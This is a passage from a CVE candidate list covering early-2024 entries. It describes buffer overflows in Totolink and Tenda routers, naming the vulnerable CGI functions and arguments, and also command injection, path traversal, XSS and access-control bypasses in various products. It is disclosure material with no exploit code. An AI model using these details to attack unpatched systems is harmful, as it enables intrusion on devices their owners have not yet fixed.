CVE 2024 1004 Candidate A vulnerability, which was classified as critical, was found in Totolink N200RE 9.3.5u.6139_B20201216. This affects the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4 | MISC:https://vuldb.com/?ctiid.252273 | URL:https://vuldb.com/?ctiid.252273 | MISC:https://vuldb.com/?id.252273 | URL:https://vuldb.com/?id.252273 Assigned (20240129)
CVE 2024 1003 Candidate A vulnerability, which was classified as critical, has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this issue is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4 | MISC:https://vuldb.com/?ctiid.252272 | URL:https://vuldb.com/?ctiid.252272 | MISC:https://vuldb.com/?id.252272 | URL:https://vuldb.com/?id.252272 Assigned (20240129)
CVE 2024 1002 Candidate A vulnerability classified as critical was found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this vulnerability is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ePort leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4 | MISC:https://vuldb.com/?ctiid.252271 | URL:https://vuldb.com/?ctiid.252271 | MISC:https://vuldb.com/?id.252271 | URL:https://vuldb.com/?id.252271 Assigned (20240129)
CVE 2024 1001 Candidate A vulnerability classified as critical has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected is the function main of the file /cgi-bin/cstecgi.cgi. The manipulation leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4 | MISC:https://vuldb.com/?ctiid.252270 | URL:https://vuldb.com/?ctiid.252270 | MISC:https://vuldb.com/?id.252270 | URL:https://vuldb.com/?id.252270 Assigned (20240129)
CVE 2024 1000 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252269 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4 | MISC:https://vuldb.com/?ctiid.252269 | URL:https://vuldb.com/?ctiid.252269 | MISC:https://vuldb.com/?id.252269 | URL:https://vuldb.com/?id.252269 Assigned (20240129)
CVE 2024 999 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument eTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4 | MISC:https://vuldb.com/?ctiid.252268 | URL:https://vuldb.com/?ctiid.252268 | MISC:https://vuldb.com/?id.252268 | URL:https://vuldb.com/?id.252268 Assigned (20240129)
CVE 2024 998 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. This affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4 | MISC:https://vuldb.com/?ctiid.252267 | URL:https://vuldb.com/?ctiid.252267 | MISC:https://vuldb.com/?id.252267 | URL:https://vuldb.com/?id.252267 Assigned (20240129)
CVE 2024 997 Candidate A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. Affected by this issue is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4 | URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4 | MISC:https://vuldb.com/?ctiid.252266 | URL:https://vuldb.com/?ctiid.252266 | MISC:https://vuldb.com/?id.252266 | URL:https://vuldb.com/?id.252266 Assigned (20240129)
CVE 2024 996 Candidate A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4 | URL:https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4 | MISC:https://vuldb.com/?ctiid.252261 | URL:https://vuldb.com/?ctiid.252261 | MISC:https://vuldb.com/?id.252261 | URL:https://vuldb.com/?id.252261 Assigned (20240128)
CVE 2024 995 Candidate A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been rated as critical. Affected by this issue is the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4 | URL:https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4 | MISC:https://vuldb.com/?ctiid.252260 | URL:https://vuldb.com/?ctiid.252260 | MISC:https://vuldb.com/?id.252260 | URL:https://vuldb.com/?id.252260 Assigned (20240128)
CVE 2024 994 Candidate A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4 | URL:https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4 | MISC:https://vuldb.com/?ctiid.252259 | URL:https://vuldb.com/?ctiid.252259 | MISC:https://vuldb.com/?id.252259 | URL:https://vuldb.com/?id.252259 Assigned (20240128)
CVE 2024 993 Candidate A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4 | URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4 | MISC:https://vuldb.com/?ctiid.252258 | URL:https://vuldb.com/?ctiid.252258 | MISC:https://vuldb.com/?id.252258 | URL:https://vuldb.com/?id.252258 Assigned (20240128)
CVE 2024 992 Candidate A vulnerability was found in Tenda i6 1.0.0.9(3857) and classified as critical. This issue affects the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252257 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4 | URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4 | MISC:https://vuldb.com/?ctiid.252257 | URL:https://vuldb.com/?ctiid.252257 | MISC:https://vuldb.com/?id.252257 | URL:https://vuldb.com/?id.252257 Assigned (20240128)
CVE 2024 991 Candidate A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4 | URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4 | MISC:https://vuldb.com/?ctiid.252256 | URL:https://vuldb.com/?ctiid.252256 | MISC:https://vuldb.com/?id.252256 | URL:https://vuldb.com/?id.252256 Assigned (20240128)
CVE 2024 990 Candidate A vulnerability, which was classified as critical, was found in Tenda i6 1.0.0.9(3857). This affects the function formSetAutoPing of the file /goform/setAutoPing of the component httpd. The manipulation of the argument ping1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4 | URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4 | MISC:https://vuldb.com/?ctiid.252255 | URL:https://vuldb.com/?ctiid.252255 | MISC:https://vuldb.com/?id.252255 | URL:https://vuldb.com/?id.252255 Assigned (20240128)
CVE 2024 989 Candidate A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/XKxaJTphW6PB | URL:https://note.zhaoj.in/share/XKxaJTphW6PB | MISC:https://vuldb.com/?ctiid.252254 | URL:https://vuldb.com/?ctiid.252254 | MISC:https://vuldb.com/?id.252254 | URL:https://vuldb.com/?id.252254 Assigned (20240128)
CVE 2024 988 Candidate A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/2dBOnquxgCDl | URL:https://note.zhaoj.in/share/2dBOnquxgCDl | MISC:https://vuldb.com/?ctiid.252253 | URL:https://vuldb.com/?ctiid.252253 | MISC:https://vuldb.com/?id.252253 | URL:https://vuldb.com/?id.252253 Assigned (20240128)
CVE 2024 987 Candidate A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/mhLwGOcLxYfP | URL:https://note.zhaoj.in/share/mhLwGOcLxYfP | MISC:https://vuldb.com/?ctiid.252252 | URL:https://vuldb.com/?ctiid.252252 | MISC:https://vuldb.com/?id.252252 | URL:https://vuldb.com/?id.252252 Assigned (20240128)
CVE 2024 986 Candidate A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link | URL:https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link | MISC:https://vuldb.com/?ctiid.252251 | URL:https://vuldb.com/?ctiid.252251 | MISC:https://vuldb.com/?id.252251 | URL:https://vuldb.com/?id.252251 Assigned (20240128)
CVE 2024 985 Candidate Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view. Versions before PostgreSQL 15.6, 14.11, 13.14, and 12.18 are affected. The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability. MISC:https://www.postgresql.org/support/security/CVE-2024-0985/ | URL:https://www.postgresql.org/support/security/CVE-2024-0985/ | MLIST:[debian-lts-announce] 20240318 [SECURITY] [DLA 3764-1] postgresql-11 security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00017.html Assigned (20240127)
CVE 2024 984 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to disable the image optimization setting. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve Assigned (20240126)
CVE 2024 983 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable image optimization. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve Assigned (20240126)
CVE 2024 978 Candidate The My Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.14 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's site privacy feature and view restricted page and post content. MISC:https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site | URL:https://plugins.trac.wordpress.org/changeset/3036015/jonradio-private-site | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/970bc71c-7d0a-4761-874a-379cda71418e?source=cve Assigned (20240126)
CVE 2024 977 Candidate The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve Assigned (20240126)
CVE 2024 976 Candidate The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32 | URL:https://plugins.trac.wordpress.org/browser/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php#L32 | MISC:https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php | URL:https://plugins.trac.wordpress.org/changeset/3039683/wp-event-manager/trunk/admin/wp-event-manager-shortcode-list.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve Assigned (20240126)
CVE 2024 975 Candidate The WordPress Access Control plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.13 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "Make Website Members Only" feature (when unset) and view restricted page and post content. MISC:https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289 | URL:https://plugins.trac.wordpress.org/browser/wordpress-access-control/trunk/wordpress-access-control.php#L289 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve Assigned (20240126)
CVE 2024 973 Candidate The Widget for Social Page Feeds WordPress plugin before 6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/ | URL:https://wpscan.com/vulnerability/798de421-4814-46a9-a055-ebb95a7218ed/ Assigned (20240126)
CVE 2024 971 Candidate A SQL injection vulnerability exists where an authenticated, low-privileged remote attacker could potentially alter scan DB content. MISC:https://www.tenable.com/security/tns-2024-01 | URL:https://www.tenable.com/security/tns-2024-01 Assigned (20240126)
CVE 2024 969 Candidate The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's "Default Restriction" feature and view restricted post content. MISC:https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php | URL:https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve Assigned (20240126)
CVE 2024 968 Candidate Cross-site Scripting (XSS) - DOM in GitHub repository langchain-ai/chat-langchain prior to 0.0.0. MISC:https://github.com/langchain-ai/chat-langchain/commit/e13db53cba2a48e4e26d103fd51598856f6bdd33 | URL:https://github.com/langchain-ai/chat-langchain/commit/e13db53cba2a48e4e26d103fd51598856f6bdd33 | MISC:https://huntr.com/bounties/566033b9-df20-4928-b4aa-5cd4c3ca1561 | URL:https://huntr.com/bounties/566033b9-df20-4928-b4aa-5cd4c3ca1561 Assigned (20240126)
CVE 2024 967 Candidate A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Enterprise Security Manager (ESM). The vulnerability could be remotely exploited. MISC:https://portal.microfocus.com/s/article/KM000027060 | URL:https://portal.microfocus.com/s/article/KM000027060 Assigned (20240126)
CVE 2024 966 Candidate The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes like 'info_text'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks the information icon. MISC:https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46 | URL:https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve Assigned (20240126)
CVE 2024 965 Candidate The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content. MISC:https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction | URL:https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve Assigned (20240126)
CVE 2024 964 Candidate A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request. MISC:https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70 | URL:https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70 | MISC:https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741 | URL:https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741 Assigned (20240126)
CVE 2024 963 Candidate The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php | URL:https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve Assigned (20240126)
CVE 2024 962 Candidate A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability. MISC:https://github.com/obgm/libcoap/issues/1310 | URL:https://github.com/obgm/libcoap/issues/1310 | MISC:https://github.com/obgm/libcoap/issues/1310#issue-2099860835 | URL:https://github.com/obgm/libcoap/issues/1310#issue-2099860835 | MISC:https://github.com/obgm/libcoap/pull/1311 | URL:https://github.com/obgm/libcoap/pull/1311 | MISC:https://vuldb.com/?ctiid.252206 | URL:https://vuldb.com/?ctiid.252206 | MISC:https://vuldb.com/?id.252206 | URL:https://vuldb.com/?id.252206 Assigned (20240126)
CVE 2024 961 Candidate The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355 | URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve | 